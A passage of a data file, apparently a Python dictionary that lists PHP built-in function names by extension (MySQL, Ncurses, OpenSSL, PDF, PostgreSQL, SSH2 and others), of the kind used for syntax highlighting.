'maxdb_enable_rpl_parse',
'maxdb_errno',
'maxdb_error',
'maxdb_escape_string',
'maxdb_execute',
'maxdb_fetch_array',
'maxdb_fetch_assoc',
'maxdb_fetch_field_direct',
'maxdb_fetch_field',
'maxdb_fetch_fields',
'maxdb_fetch_lengths',
'maxdb_fetch_object',
'maxdb_fetch_row',
'maxdb_fetch',
'maxdb_field_count',
'maxdb_field_seek',
'maxdb_field_tell',
'maxdb_free_result',
'maxdb_get_client_info',
'maxdb_get_client_version',
'maxdb_get_host_info',
'maxdb_get_metadata',
'maxdb_get_proto_info',
'maxdb_get_server_info',
'maxdb_get_server_version',
'maxdb_info',
'maxdb_init',
'maxdb_insert_id',
'maxdb_kill',
'maxdb_master_query',
'maxdb_more_results',
'maxdb_multi_query',
'maxdb_next_result',
'maxdb_num_fields',
'maxdb_num_rows',
'maxdb_options',
'maxdb_param_count',
'maxdb_ping',
'maxdb_prepare',
'maxdb_query',
'maxdb_real_connect',
'maxdb_real_escape_string',
'maxdb_real_query',
'maxdb_report',
'maxdb_rollback',
'maxdb_rpl_parse_enabled',
'maxdb_rpl_probe',
'maxdb_rpl_query_type',
'maxdb_select_db',
'maxdb_send_long_data',
'maxdb_send_query',
'maxdb_server_end',
'maxdb_server_init',
'maxdb_set_opt',
'maxdb_sqlstate',
'maxdb_ssl_set',
'maxdb_stat',
'maxdb_stmt_affected_rows'],
'Mcrypt': ['mcrypt_cbc',
'mcrypt_cfb',
'mcrypt_create_iv',
'mcrypt_decrypt',
'mcrypt_ecb',
'mcrypt_enc_get_algorithms_name',
'mcrypt_enc_get_block_size',
'mcrypt_enc_get_iv_size',
'mcrypt_enc_get_key_size',
'mcrypt_enc_get_modes_name',
'mcrypt_enc_get_supported_key_sizes',
'mcrypt_enc_is_block_algorithm_mode',
'mcrypt_enc_is_block_algorithm',
'mcrypt_enc_is_block_mode',
'mcrypt_enc_self_test',
'mcrypt_encrypt',
'mcrypt_generic_deinit',
'mcrypt_generic_end',
'mcrypt_generic_init',
'mcrypt_generic',
'mcrypt_get_block_size',
'mcrypt_get_cipher_name',
'mcrypt_get_iv_size',
'mcrypt_get_key_size',
'mcrypt_list_algorithms',
'mcrypt_list_modes',
'mcrypt_module_close',
'mcrypt_module_get_algo_block_size',
'mcrypt_module_get_algo_key_size',
'mcrypt_module_get_supported_key_sizes',
'mcrypt_module_is_block_algorithm_mode',
'mcrypt_module_is_block_algorithm',
'mcrypt_module_is_block_mode',
'mcrypt_module_open',
'mcrypt_module_self_test',
'mcrypt_ofb',
'mdecrypt_generic'],
'Memcache': ['memcache_debug'],
'Mhash': ['mhash_count',
'mhash_get_block_size',
'mhash_get_hash_name',
'mhash_keygen_s2k',
'mhash'],
'Ming': ['ming_keypress',
'ming_setcubicthreshold',
'ming_setscale',
'ming_setswfcompression',
'ming_useconstants',
'ming_useswfversion'],
'Misc.': ['connection_aborted',
'connection_status',
'connection_timeout',
'constant',
'define',
'defined',
'die',
'eval',
'exit',
'get_browser',
'__halt_compiler',
'highlight_file',
'highlight_string',
'ignore_user_abort',
'pack',
'php_check_syntax',
'php_strip_whitespace',
'show_source',
'sleep',
'sys_getloadavg',
'time_nanosleep',
'time_sleep_until',
'uniqid',
'unpack',
'usleep'],
'Mongo': ['bson_decode', 'bson_encode'],
'Msession': ['msession_connect',
'msession_count',
'msession_create',
'msession_destroy',
'msession_disconnect',
'msession_find',
'msession_get_array',
'msession_get_data',
'msession_get',
'msession_inc',
'msession_list',
'msession_listvar',
'msession_lock',
'msession_plugin',
'msession_randstr',
'msession_set_array',
'msession_set_data',
'msession_set',
'msession_timeout',
'msession_uniq',
'msession_unlock'],
'Mssql': ['mssql_bind',
'mssql_close',
'mssql_connect',
'mssql_data_seek',
'mssql_execute',
'mssql_fetch_array',
'mssql_fetch_assoc',
'mssql_fetch_batch',
'mssql_fetch_field',
'mssql_fetch_object',
'mssql_fetch_row',
'mssql_field_length',
'mssql_field_name',
'mssql_field_seek',
'mssql_field_type',
'mssql_free_result',
'mssql_free_statement',
'mssql_get_last_message',
'mssql_guid_string',
'mssql_init',
'mssql_min_error_severity',
'mssql_min_message_severity',
'mssql_next_result',
'mssql_num_fields',
'mssql_num_rows',
'mssql_pconnect',
'mssql_query',
'mssql_result',
'mssql_rows_affected',
'mssql_select_db'],
'Multibyte String': ['mb_check_encoding',
'mb_convert_case',
'mb_convert_encoding',
'mb_convert_kana',
'mb_convert_variables',
'mb_decode_mimeheader',
'mb_decode_numericentity',
'mb_detect_encoding',
'mb_detect_order',
'mb_encode_mimeheader',
'mb_encode_numericentity',
'mb_encoding_aliases',
'mb_ereg_match',
'mb_ereg_replace',
'mb_ereg_search_getpos',
'mb_ereg_search_getregs',
'mb_ereg_search_init',
'mb_ereg_search_pos',
'mb_ereg_search_regs',
'mb_ereg_search_setpos',
'mb_ereg_search',
'mb_ereg',
'mb_eregi_replace',
'mb_eregi',
'mb_get_info',
'mb_http_input',
'mb_http_output',
'mb_internal_encoding',
'mb_language',
'mb_list_encodings',
'mb_output_handler',
'mb_parse_str',
'mb_preferred_mime_name',
'mb_regex_encoding',
'mb_regex_set_options',
'mb_send_mail',
'mb_split',
'mb_strcut',
'mb_strimwidth',
'mb_stripos',
'mb_stristr',
'mb_strlen',
'mb_strpos',
'mb_strrchr',
'mb_strrichr',
'mb_strripos',
'mb_strrpos',
'mb_strstr',
'mb_strtolower',
'mb_strtoupper',
'mb_strwidth',
'mb_substitute_character',
'mb_substr_count',
'mb_substr'],
'MySQL': ['mysql_affected_rows',
'mysql_client_encoding',
'mysql_close',
'mysql_connect',
'mysql_create_db',
'mysql_data_seek',
'mysql_db_name',
'mysql_db_query',
'mysql_drop_db',
'mysql_errno',
'mysql_error',
'mysql_escape_string',
'mysql_fetch_array',
'mysql_fetch_assoc',
'mysql_fetch_field',
'mysql_fetch_lengths',
'mysql_fetch_object',
'mysql_fetch_row',
'mysql_field_flags',
'mysql_field_len',
'mysql_field_name',
'mysql_field_seek',
'mysql_field_table',
'mysql_field_type',
'mysql_free_result',
'mysql_get_client_info',
'mysql_get_host_info',
'mysql_get_proto_info',
'mysql_get_server_info',
'mysql_info',
'mysql_insert_id',
'mysql_list_dbs',
'mysql_list_fields',
'mysql_list_processes',
'mysql_list_tables',
'mysql_num_fields',
'mysql_num_rows',
'mysql_pconnect',
'mysql_ping',
'mysql_query',
'mysql_real_escape_string',
'mysql_result',
'mysql_select_db',
'mysql_set_charset',
'mysql_stat',
'mysql_tablename',
'mysql_thread_id',
'mysql_unbuffered_query'],
'NSAPI': ['nsapi_request_headers', 'nsapi_response_headers', 'nsapi_virtual'],
'Ncurses': ['ncurses_addch',
'ncurses_addchnstr',
'ncurses_addchstr',
'ncurses_addnstr',
'ncurses_addstr',
'ncurses_assume_default_colors',
'ncurses_attroff',
'ncurses_attron',
'ncurses_attrset',
'ncurses_baudrate',
'ncurses_beep',
'ncurses_bkgd',
'ncurses_bkgdset',
'ncurses_border',
'ncurses_bottom_panel',
'ncurses_can_change_color',
'ncurses_cbreak',
'ncurses_clear',
'ncurses_clrtobot',
'ncurses_clrtoeol',
'ncurses_color_content',
'ncurses_color_set',
'ncurses_curs_set',
'ncurses_def_prog_mode',
'ncurses_def_shell_mode',
'ncurses_define_key',
'ncurses_del_panel',
'ncurses_delay_output',
'ncurses_delch',
'ncurses_deleteln',
'ncurses_delwin',
'ncurses_doupdate',
'ncurses_echo',
'ncurses_echochar',
'ncurses_end',
'ncurses_erase',
'ncurses_erasechar',
'ncurses_filter',
'ncurses_flash',
'ncurses_flushinp',
'ncurses_getch',
'ncurses_getmaxyx',
'ncurses_getmouse',
'ncurses_getyx',
'ncurses_halfdelay',
'ncurses_has_colors',
'ncurses_has_ic',
'ncurses_has_il',
'ncurses_has_key',
'ncurses_hide_panel',
'ncurses_hline',
'ncurses_inch',
'ncurses_init_color',
'ncurses_init_pair',
'ncurses_init',
'ncurses_insch',
'ncurses_insdelln',
'ncurses_insertln',
'ncurses_insstr',
'ncurses_instr',
'ncurses_isendwin',
'ncurses_keyok',
'ncurses_keypad',
'ncurses_killchar',
'ncurses_longname',
'ncurses_meta',
'ncurses_mouse_trafo',
'ncurses_mouseinterval',
'ncurses_mousemask',
'ncurses_move_panel',
'ncurses_move',
'ncurses_mvaddch',
'ncurses_mvaddchnstr',
'ncurses_mvaddchstr',
'ncurses_mvaddnstr',
'ncurses_mvaddstr',
'ncurses_mvcur',
'ncurses_mvdelch',
'ncurses_mvgetch',
'ncurses_mvhline',
'ncurses_mvinch',
'ncurses_mvvline',
'ncurses_mvwaddstr',
'ncurses_napms',
'ncurses_new_panel',
'ncurses_newpad',
'ncurses_newwin',
'ncurses_nl',
'ncurses_nocbreak',
'ncurses_noecho',
'ncurses_nonl',
'ncurses_noqiflush',
'ncurses_noraw',
'ncurses_pair_content',
'ncurses_panel_above',
'ncurses_panel_below',
'ncurses_panel_window',
'ncurses_pnoutrefresh',
'ncurses_prefresh',
'ncurses_putp',
'ncurses_qiflush',
'ncurses_raw',
'ncurses_refresh',
'ncurses_replace_panel',
'ncurses_reset_prog_mode',
'ncurses_reset_shell_mode',
'ncurses_resetty',
'ncurses_savetty',
'ncurses_scr_dump',
'ncurses_scr_init',
'ncurses_scr_restore',
'ncurses_scr_set',
'ncurses_scrl',
'ncurses_show_panel',
'ncurses_slk_attr',
'ncurses_slk_attroff',
'ncurses_slk_attron',
'ncurses_slk_attrset',
'ncurses_slk_clear',
'ncurses_slk_color',
'ncurses_slk_init',
'ncurses_slk_noutrefresh',
'ncurses_slk_refresh',
'ncurses_slk_restore',
'ncurses_slk_set',
'ncurses_slk_touch',
'ncurses_standend',
'ncurses_standout',
'ncurses_start_color',
'ncurses_termattrs',
'ncurses_termname',
'ncurses_timeout',
'ncurses_top_panel',
'ncurses_typeahead',
'ncurses_ungetch',
'ncurses_ungetmouse',
'ncurses_update_panels',
'ncurses_use_default_colors',
'ncurses_use_env',
'ncurses_use_extended_names',
'ncurses_vidattr',
'ncurses_vline',
'ncurses_waddch',
'ncurses_waddstr',
'ncurses_wattroff',
'ncurses_wattron',
'ncurses_wattrset',
'ncurses_wborder',
'ncurses_wclear',
'ncurses_wcolor_set',
'ncurses_werase',
'ncurses_wgetch',
'ncurses_whline',
'ncurses_wmouse_trafo',
'ncurses_wmove',
'ncurses_wnoutrefresh',
'ncurses_wrefresh',
'ncurses_wstandend',
'ncurses_wstandout',
'ncurses_wvline'],
'Network': ['checkdnsrr',
'closelog',
'define_syslog_variables',
'dns_check_record',
'dns_get_mx',
'dns_get_record',
'fsockopen',
'gethostbyaddr',
'gethostbyname',
'gethostbynamel'],
'Newt': ['newt_bell',
'newt_button_bar',
'newt_button',
'newt_centered_window',
'newt_checkbox_get_value',
'newt_checkbox_set_flags',
'newt_checkbox_set_value',
'newt_checkbox_tree_add_item',
'newt_checkbox_tree_find_item',
'newt_checkbox_tree_get_current',
'newt_checkbox_tree_get_entry_value',
'newt_checkbox_tree_get_multi_selection',
'newt_checkbox_tree_get_selection',
'newt_checkbox_tree_multi',
'newt_checkbox_tree_set_current',
'newt_checkbox_tree_set_entry_value',
'newt_checkbox_tree_set_entry',
'newt_checkbox_tree_set_width',
'newt_checkbox_tree',
'newt_checkbox',
'newt_clear_key_buffer'],
'OAuth': ['oauth_get_sbs', 'oauth_urlencode'],
'OCI8': ['oci_bind_array_by_name',
'oci_bind_by_name',
'oci_cancel',
'oci_close',
'oci_commit',
'oci_connect',
'oci_define_by_name',
'oci_error',
'oci_execute',
'oci_fetch_all',
'oci_fetch_array',
'oci_fetch_assoc',
'oci_fetch_object',
'oci_fetch_row',
'oci_fetch',
'oci_field_is_null',
'oci_field_name',
'oci_field_precision',
'oci_field_scale',
'oci_field_size',
'oci_field_type_raw',
'oci_field_type',
'oci_free_statement',
'oci_internal_debug',
'oci_lob_copy',
'oci_lob_is_equal',
'oci_new_collection',
'oci_new_connect',
'oci_new_cursor',
'oci_new_descriptor',
'oci_num_fields',
'oci_num_rows',
'oci_parse',
'oci_password_change',
'oci_pconnect',
'oci_result',
'oci_rollback',
'oci_server_version',
'oci_set_action',
'oci_set_client_identifier',
'oci_set_client_info',
'oci_set_edition',
'oci_set_module_name',
'oci_set_prefetch',
'oci_statement_type'],
'ODBC': ['odbc_autocommit',
'odbc_binmode',
'odbc_close_all',
'odbc_close',
'odbc_columnprivileges',
'odbc_columns',
'odbc_commit',
'odbc_connect',
'odbc_cursor',
'odbc_data_source',
'odbc_do',
'odbc_error',
'odbc_errormsg',
'odbc_exec',
'odbc_execute',
'odbc_fetch_array',
'odbc_fetch_into',
'odbc_fetch_object',
'odbc_fetch_row',
'odbc_field_len',
'odbc_field_name',
'odbc_field_num',
'odbc_field_precision',
'odbc_field_scale',
'odbc_field_type',
'odbc_foreignkeys',
'odbc_free_result',
'odbc_gettypeinfo',
'odbc_longreadlen',
'odbc_next_result',
'odbc_num_fields',
'odbc_num_rows',
'odbc_pconnect',
'odbc_prepare',
'odbc_primarykeys',
'odbc_procedurecolumns',
'odbc_procedures',
'odbc_result_all',
'odbc_result',
'odbc_rollback',
'odbc_setoption',
'odbc_specialcolumns',
'odbc_statistics',
'odbc_tableprivileges',
'odbc_tables'],
'Object Aggregation': ['aggregate_info',
'aggregate_methods_by_list',
'aggregate_methods_by_regexp'],
'Object overloading': ['overload'],
'OpenAL': ['openal_buffer_create',
'openal_buffer_data',
'openal_buffer_destroy',
'openal_buffer_get',
'openal_buffer_loadwav',
'openal_context_create',
'openal_context_current',
'openal_context_destroy',
'openal_context_process',
'openal_context_suspend',
'openal_device_close',
'openal_device_open',
'openal_listener_get',
'openal_listener_set',
'openal_source_create',
'openal_source_destroy',
'openal_source_get',
'openal_source_pause',
'openal_source_play',
'openal_source_rewind',
'openal_source_set',
'openal_source_stop',
'openal_stream'],
'OpenSSL': ['openssl_csr_export_to_file',
'openssl_csr_export',
'openssl_csr_get_public_key',
'openssl_csr_get_subject',
'openssl_csr_new',
'openssl_csr_sign',
'openssl_decrypt',
'openssl_dh_compute_key',
'openssl_digest',
'openssl_encrypt',
'openssl_error_string',
'openssl_free_key',
'openssl_get_cipher_methods',
'openssl_get_md_methods',
'openssl_get_privatekey',
'openssl_get_publickey',
'openssl_open',
'openssl_pkcs12_export_to_file',
'openssl_pkcs12_export',
'openssl_pkcs12_read',
'openssl_pkcs7_decrypt',
'openssl_pkcs7_encrypt',
'openssl_pkcs7_sign',
'openssl_pkcs7_verify',
'openssl_pkey_export_to_file',
'openssl_pkey_export',
'openssl_pkey_free',
'openssl_pkey_get_details',
'openssl_pkey_get_private',
'openssl_pkey_get_public',
'openssl_pkey_new',
'openssl_private_decrypt',
'openssl_private_encrypt',
'openssl_public_decrypt',
'openssl_public_encrypt',
'openssl_random_pseudo_bytes',
'openssl_seal',
'openssl_sign',
'openssl_verify',
'openssl_x509_check_private_key',
'openssl_x509_checkpurpose',
'openssl_x509_export_to_file',
'openssl_x509_export',
'openssl_x509_free',
'openssl_x509_parse',
'openssl_x509_read'],
'Output Control': ['flush',
'ob_clean',
'ob_end_clean',
'ob_end_flush',
'ob_flush',
'ob_get_clean',
'ob_get_contents',
'ob_get_flush',
'ob_get_length',
'ob_get_level',
'ob_get_status',
'ob_gzhandler',
'ob_implicit_flush',
'ob_list_handlers',
'ob_start',
'output_add_rewrite_var',
'output_reset_rewrite_vars'],
'Ovrimos SQL': ['ovrimos_close',
'ovrimos_commit',
'ovrimos_connect',
'ovrimos_cursor',
'ovrimos_exec',
'ovrimos_execute',
'ovrimos_fetch_into',
'ovrimos_fetch_row',
'ovrimos_field_len',
'ovrimos_field_name',
'ovrimos_field_num',
'ovrimos_field_type',
'ovrimos_free_result',
'ovrimos_longreadlen',
'ovrimos_num_fields',
'ovrimos_num_rows',
'ovrimos_prepare',
'ovrimos_result_all',
'ovrimos_result',
'ovrimos_rollback'],
'PCNTL': ['pcntl_alarm',
'pcntl_exec',
'pcntl_fork',
'pcntl_getpriority',
'pcntl_setpriority',
'pcntl_signal_dispatch',
'pcntl_signal',
'pcntl_sigprocmask',
'pcntl_sigtimedwait',
'pcntl_sigwaitinfo',
'pcntl_wait',
'pcntl_waitpid',
'pcntl_wexitstatus',
'pcntl_wifexited',
'pcntl_wifsignaled',
'pcntl_wifstopped',
'pcntl_wstopsig',
'pcntl_wtermsig'],
'PCRE': ['preg_filter',
'preg_grep',
'preg_last_error',
'preg_match_all',
'preg_match',
'preg_quote',
'preg_replace_callback',
'preg_replace',
'preg_split'],
'PDF': ['PDF_activate_item',
'PDF_add_annotation',
'PDF_add_bookmark',
'PDF_add_launchlink',
'PDF_add_locallink',
'PDF_add_nameddest',
'PDF_add_note',
'PDF_add_outline',
'PDF_add_pdflink',
'PDF_add_table_cell',
'PDF_add_textflow',
'PDF_add_thumbnail',
'PDF_add_weblink',
'PDF_arc',
'PDF_arcn',
'PDF_attach_file',
'PDF_begin_document',
'PDF_begin_font',
'PDF_begin_glyph',
'PDF_begin_item',
'PDF_begin_layer',
'PDF_begin_page_ext',
'PDF_begin_page',
'PDF_begin_pattern',
'PDF_begin_template_ext',
'PDF_begin_template',
'PDF_circle',
'PDF_clip',
'PDF_close_image',
'PDF_close_pdi_page',
'PDF_close_pdi',
'PDF_close',
'PDF_closepath_fill_stroke',
'PDF_closepath_stroke',
'PDF_closepath',
'PDF_concat',
'PDF_continue_text',
'PDF_create_3dview',
'PDF_create_action',
'PDF_create_annotation',
'PDF_create_bookmark',
'PDF_create_field',
'PDF_create_fieldgroup',
'PDF_create_gstate',
'PDF_create_pvf',
'PDF_create_textflow',
'PDF_curveto',
'PDF_define_layer',
'PDF_delete_pvf',
'PDF_delete_table',
'PDF_delete_textflow',
'PDF_delete',
'PDF_encoding_set_char',
'PDF_end_document',
'PDF_end_font',
'PDF_end_glyph',
'PDF_end_item',
'PDF_end_layer',
'PDF_end_page_ext',
'PDF_end_page',
'PDF_end_pattern',
'PDF_end_template',
'PDF_endpath',
'PDF_fill_imageblock',
'PDF_fill_pdfblock',
'PDF_fill_stroke',
'PDF_fill_textblock',
'PDF_fill',
'PDF_findfont',
'PDF_fit_image',
'PDF_fit_pdi_page',
'PDF_fit_table',
'PDF_fit_textflow',
'PDF_fit_textline',
'PDF_get_apiname',
'PDF_get_buffer',
'PDF_get_errmsg',
'PDF_get_errnum',
'PDF_get_font',
'PDF_get_fontname',
'PDF_get_fontsize',
'PDF_get_image_height',
'PDF_get_image_width',
'PDF_get_majorversion',
'PDF_get_minorversion',
'PDF_get_parameter',
'PDF_get_pdi_parameter',
'PDF_get_pdi_value',
'PDF_get_value',
'PDF_info_font',
'PDF_info_matchbox',
'PDF_info_table',
'PDF_info_textflow',
'PDF_info_textline',
'PDF_initgraphics',
'PDF_lineto',
'PDF_load_3ddata',
'PDF_load_font',
'PDF_load_iccprofile',
'PDF_load_image',
'PDF_makespotcolor',
'PDF_moveto',
'PDF_new',
'PDF_open_ccitt',
'PDF_open_file',
'PDF_open_gif',
'PDF_open_image_file',
'PDF_open_image',
'PDF_open_jpeg',
'PDF_open_memory_image',
'PDF_open_pdi_document',
'PDF_open_pdi_page',
'PDF_open_pdi',
'PDF_open_tiff',
'PDF_pcos_get_number',
'PDF_pcos_get_stream',
'PDF_pcos_get_string',
'PDF_place_image',
'PDF_place_pdi_page',
'PDF_process_pdi',
'PDF_rect',
'PDF_restore',
'PDF_resume_page',
'PDF_rotate',
'PDF_save',
'PDF_scale',
'PDF_set_border_color',
'PDF_set_border_dash',
'PDF_set_border_style',
'PDF_set_char_spacing',
'PDF_set_duration',
'PDF_set_gstate',
'PDF_set_horiz_scaling',
'PDF_set_info_author',
'PDF_set_info_creator',
'PDF_set_info_keywords',
'PDF_set_info_subject',
'PDF_set_info_title',
'PDF_set_info',
'PDF_set_layer_dependency',
'PDF_set_leading',
'PDF_set_parameter',
'PDF_set_text_matrix',
'PDF_set_text_pos',
'PDF_set_text_rendering',
'PDF_set_text_rise',
'PDF_set_value',
'PDF_set_word_spacing',
'PDF_setcolor',
'PDF_setdash',
'PDF_setdashpattern',
'PDF_setflat',
'PDF_setfont',
'PDF_setgray_fill',
'PDF_setgray_stroke',
'PDF_setgray',
'PDF_setlinecap',
'PDF_setlinejoin',
'PDF_setlinewidth',
'PDF_setmatrix',
'PDF_setmiterlimit',
'PDF_setpolydash',
'PDF_setrgbcolor_fill',
'PDF_setrgbcolor_stroke',
'PDF_setrgbcolor',
'PDF_shading_pattern',
'PDF_shading',
'PDF_shfill',
'PDF_show_boxed',
'PDF_show_xy',
'PDF_show',
'PDF_skew',
'PDF_stringwidth',
'PDF_stroke',
'PDF_suspend_page',
'PDF_translate',
'PDF_utf16_to_utf8',
'PDF_utf32_to_utf16',
'PDF_utf8_to_utf16'],
'PHP Options/Info': ['assert_options',
'assert',
'dl',
'extension_loaded',
'gc_collect_cycles',
'gc_disable',
'gc_enable',
'gc_enabled',
'get_cfg_var',
'get_current_user',
'get_defined_constants',
'get_extension_funcs',
'get_include_path',
'get_included_files',
'get_loaded_extensions',
'get_magic_quotes_gpc',
'get_magic_quotes_runtime',
'get_required_files',
'getenv',
'getlastmod',
'getmygid',
'getmyinode',
'getmypid',
'getmyuid',
'getopt',
'getrusage',
'ini_alter',
'ini_get_all',
'ini_get',
'ini_restore',
'ini_set',
'magic_quotes_runtime',
'memory_get_peak_usage',
'memory_get_usage',
'php_ini_loaded_file',
'php_ini_scanned_files',
'php_logo_guid',
'php_sapi_name',
'php_uname',
'phpcredits',
'phpinfo',
'phpversion',
'putenv',
'restore_include_path',
'set_include_path',
'set_magic_quotes_runtime',
'set_time_limit',
'sys_get_temp_dir',
'version_compare',
'zend_logo_guid',
'zend_thread_id',
'zend_version'],
'POSIX': ['posix_access',
'posix_ctermid',
'posix_errno',
'posix_get_last_error',
'posix_getcwd',
'posix_getegid',
'posix_geteuid',
'posix_getgid',
'posix_getgrgid',
'posix_getgrnam',
'posix_getgroups',
'posix_getlogin',
'posix_getpgid',
'posix_getpgrp',
'posix_getpid',
'posix_getppid',
'posix_getpwnam',
'posix_getpwuid',
'posix_getrlimit',
'posix_getsid',
'posix_getuid',
'posix_initgroups',
'posix_isatty',
'posix_kill',
'posix_mkfifo',
'posix_mknod',
'posix_setegid',
'posix_seteuid',
'posix_setgid',
'posix_setpgid',
'posix_setsid',
'posix_setuid',
'posix_strerror',
'posix_times',
'posix_ttyname',
'posix_uname'],
'POSIX Regex': ['ereg_replace',
'ereg',
'eregi_replace',
'eregi',
'split',
'spliti',
'sql_regcase'],
'PS': ['ps_add_bookmark',
'ps_add_launchlink',
'ps_add_locallink',
'ps_add_note',
'ps_add_pdflink',
'ps_add_weblink',
'ps_arc',
'ps_arcn',
'ps_begin_page',
'ps_begin_pattern',
'ps_begin_template',
'ps_circle',
'ps_clip',
'ps_close_image',
'ps_close',
'ps_closepath_stroke',
'ps_closepath',
'ps_continue_text',
'ps_curveto',
'ps_delete',
'ps_end_page',
'ps_end_pattern',
'ps_end_template',
'ps_fill_stroke',
'ps_fill',
'ps_findfont',
'ps_get_buffer',
'ps_get_parameter',
'ps_get_value',
'ps_hyphenate',
'ps_include_file',
'ps_lineto',
'ps_makespotcolor',
'ps_moveto',
'ps_new',
'ps_open_file',
'ps_open_image_file',
'ps_open_image',
'ps_open_memory_image',
'ps_place_image',
'ps_rect',
'ps_restore',
'ps_rotate',
'ps_save',
'ps_scale',
'ps_set_border_color',
'ps_set_border_dash',
'ps_set_border_style',
'ps_set_info',
'ps_set_parameter',
'ps_set_text_pos',
'ps_set_value',
'ps_setcolor',
'ps_setdash',
'ps_setflat',
'ps_setfont',
'ps_setgray',
'ps_setlinecap',
'ps_setlinejoin',
'ps_setlinewidth',
'ps_setmiterlimit',
'ps_setoverprintmode',
'ps_setpolydash',
'ps_shading_pattern',
'ps_shading',
'ps_shfill',
'ps_show_boxed',
'ps_show_xy2',
'ps_show_xy',
'ps_show2',
'ps_show',
'ps_string_geometry',
'ps_stringwidth',
'ps_stroke',
'ps_symbol_name',
'ps_symbol_width',
'ps_symbol',
'ps_translate'],
'Paradox': ['px_close',
'px_create_fp',
'px_date2string',
'px_delete_record',
'px_delete',
'px_get_field',
'px_get_info',
'px_get_parameter',
'px_get_record',
'px_get_schema',
'px_get_value',
'px_insert_record',
'px_new',
'px_numfields',
'px_numrecords',
'px_open_fp',
'px_put_record',
'px_retrieve_record',
'px_set_blob_file',
'px_set_parameter',
'px_set_tablename',
'px_set_targetencoding',
'px_set_value',
'px_timestamp2string',
'px_update_record'],
'Parsekit': ['parsekit_compile_file',
'parsekit_compile_string',
'parsekit_func_arginfo'],
'PostgreSQL': ['pg_affected_rows',
'pg_cancel_query',
'pg_client_encoding',
'pg_close',
'pg_connect',
'pg_connection_busy',
'pg_connection_reset',
'pg_connection_status',
'pg_convert',
'pg_copy_from',
'pg_copy_to',
'pg_dbname',
'pg_delete',
'pg_end_copy',
'pg_escape_bytea',
'pg_escape_string',
'pg_execute',
'pg_fetch_all_columns',
'pg_fetch_all',
'pg_fetch_array',
'pg_fetch_assoc',
'pg_fetch_object',
'pg_fetch_result',
'pg_fetch_row',
'pg_field_is_null',
'pg_field_name',
'pg_field_num',
'pg_field_prtlen',
'pg_field_size',
'pg_field_table',
'pg_field_type_oid',
'pg_field_type',
'pg_free_result',
'pg_get_notify',
'pg_get_pid',
'pg_get_result',
'pg_host',
'pg_insert',
'pg_last_error',
'pg_last_notice',
'pg_last_oid',
'pg_lo_close',
'pg_lo_create',
'pg_lo_export',
'pg_lo_import',
'pg_lo_open',
'pg_lo_read_all',
'pg_lo_read',
'pg_lo_seek',
'pg_lo_tell',
'pg_lo_unlink',
'pg_lo_write',
'pg_meta_data',
'pg_num_fields',
'pg_num_rows',
'pg_options',
'pg_parameter_status',
'pg_pconnect',
'pg_ping',
'pg_port',
'pg_prepare'],
'Printer': ['printer_abort',
'printer_close',
'printer_create_brush',
'printer_create_dc',
'printer_create_font',
'printer_create_pen',
'printer_delete_brush',
'printer_delete_dc',
'printer_delete_font',
'printer_delete_pen',
'printer_draw_bmp',
'printer_draw_chord',
'printer_draw_elipse',
'printer_draw_line',
'printer_draw_pie',
'printer_draw_rectangle',
'printer_draw_roundrect',
'printer_draw_text',
'printer_end_doc',
'printer_end_page',
'printer_get_option',
'printer_list',
'printer_logical_fontheight',
'printer_open',
'printer_select_brush',
'printer_select_font',
'printer_select_pen',
'printer_set_option',
'printer_start_doc',
'printer_start_page',
'printer_write'],
'Program execution': ['escapeshellarg',
'escapeshellcmd',
'exec',
'passthru',
'proc_close',
'proc_get_status',
'proc_nice',
'proc_open',
'proc_terminate',
'shell_exec',
'system'],
'Pspell': ['pspell_add_to_personal',
'pspell_add_to_session',
'pspell_check',
'pspell_clear_session',
'pspell_config_create',
'pspell_config_data_dir',
'pspell_config_dict_dir',
'pspell_config_ignore',
'pspell_config_mode',
'pspell_config_personal',
'pspell_config_repl',
'pspell_config_runtogether',
'pspell_config_save_repl'],
'RPM Reader': ['rpm_close',
'rpm_get_tag',
'rpm_is_valid',
'rpm_open',
'rpm_version'],
'RRD': ['rrd_create',
'rrd_error',
'rrd_fetch',
'rrd_first',
'rrd_graph',
'rrd_info',
'rrd_last',
'rrd_lastupdate',
'rrd_restore',
'rrd_tune',
'rrd_update',
'rrd_xport'],
'Radius': ['radius_acct_open',
'radius_add_server',
'radius_auth_open',
'radius_close',
'radius_config',
'radius_create_request',
'radius_cvt_addr',
'radius_cvt_int',
'radius_cvt_string',
'radius_demangle_mppe_key',
'radius_demangle',
'radius_get_attr',
'radius_get_vendor_attr',
'radius_put_addr',
'radius_put_attr',
'radius_put_int',
'radius_put_string',
'radius_put_vendor_addr',
'radius_put_vendor_attr',
'radius_put_vendor_int',
'radius_put_vendor_string',
'radius_request_authenticator',
'radius_send_request',
'radius_server_secret',
'radius_strerror'],
'Rar': ['rar_wrapper_cache_stats'],
'Readline': ['readline_add_history',
'readline_callback_handler_install',
'readline_callback_handler_remove',
'readline_callback_read_char',
'readline_clear_history',
'readline_completion_function',
'readline_info',
'readline_list_history',
'readline_on_new_line',
'readline_read_history',
'readline_redisplay',
'readline_write_history',
'readline'],
'Recode': ['recode_file', 'recode_string', 'recode'],
'SNMP': ['snmp_get_quick_print',
'snmp_get_valueretrieval',
'snmp_read_mib',
'snmp_set_enum_print',
'snmp_set_oid_numeric_print',
'snmp_set_oid_output_format',
'snmp_set_quick_print',
'snmp_set_valueretrieval',
'snmp2_get',
'snmp2_getnext',
'snmp2_real_walk',
'snmp2_set',
'snmp2_walk',
'snmp3_get',
'snmp3_getnext',
'snmp3_real_walk',
'snmp3_set',
'snmp3_walk',
'snmpget',
'snmpgetnext',
'snmprealwalk',
'snmpset',
'snmpwalk',
'snmpwalkoid'],
'SOAP': ['is_soap_fault', 'use_soap_error_handler'],
'SPL': ['class_implements',
'class_parents',
'iterator_apply',
'iterator_count',
'iterator_to_array',
'spl_autoload_call',
'spl_autoload_extensions',
'spl_autoload_functions',
'spl_autoload_register',
'spl_autoload_unregister',
'spl_autoload',
'spl_classes',
'spl_object_hash'],
'SPPLUS': ['calcul_hmac', 'calculhmac', 'nthmac', 'signeurlpaiement'],
'SQLite': ['sqlite_array_query', 'sqlite_busy_timeout', 'sqlite_changes'],
'SSH2': ['ssh2_auth_hostbased_file',
'ssh2_auth_none',
'ssh2_auth_password',
'ssh2_auth_pubkey_file',
'ssh2_connect',
'ssh2_exec',
'ssh2_fetch_stream',
'ssh2_fingerprint',
'ssh2_methods_negotiated',
'ssh2_publickey_add',
'ssh2_publickey_init',
'ssh2_publickey_list',
'ssh2_publickey_remove',
'ssh2_scp_recv',
'ssh2_scp_send',
'ssh2_sftp_lstat',
'ssh2_sftp_mkdir',
